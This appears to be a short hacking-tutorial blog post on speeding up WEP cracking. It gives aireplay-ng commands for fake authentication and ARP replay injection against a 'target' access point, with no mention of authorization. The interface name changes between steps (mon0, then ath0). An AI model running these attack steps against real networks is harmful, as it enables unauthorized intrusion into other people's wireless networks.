There are a few things you can do to speed up WEP cracking. The packet capture rate largely depends on the traffic currently being handled by the WEP encrypted WiFi access point. So, here’s what you can do to speed up WEP cracking.
The following steps should be done after Step 7 of Wifi Hack: Crack WEP Passwords With Kali.
> Speed Up WEP Cracking Step 1: Fake Authentication
You will trick the target WiFi access point into believing that your wireless interface is an authenticated user. This way the target WiFi access point will accept your ARP packets that you will inject rapidly in Step of this tutorial.
Open a seperate Terminal and enter:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
Where:
- -1 means fake authentication
- 0 reassociation timing in seconds
- -e teddy is the wireless network name
- -a 00:14:6C:7E:40:80 is the access point MAC address
- -h 00:0F:B5:88:AC:82 is our card MAC address
- mon0 is the wireless interface name
> Speed Up WEP Cracking Step 2: ARP Request Replay Mode
This step is the main event. It greatly speeds up the rate at which IVs are captured. Enter the following command to start the ARP request replay mode:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Now you’ll have to wait for some time till it gets an ARP request. As soon as it gets one, the terminal will sort of explode. The data packets will start filling in.

Continue with rest of the WEP cracking procedure. You will notice that the time taken to crack WEP encryption is significantly reduced. My record time for cracking a WEP encrypted wireless access point is 5 minutes!
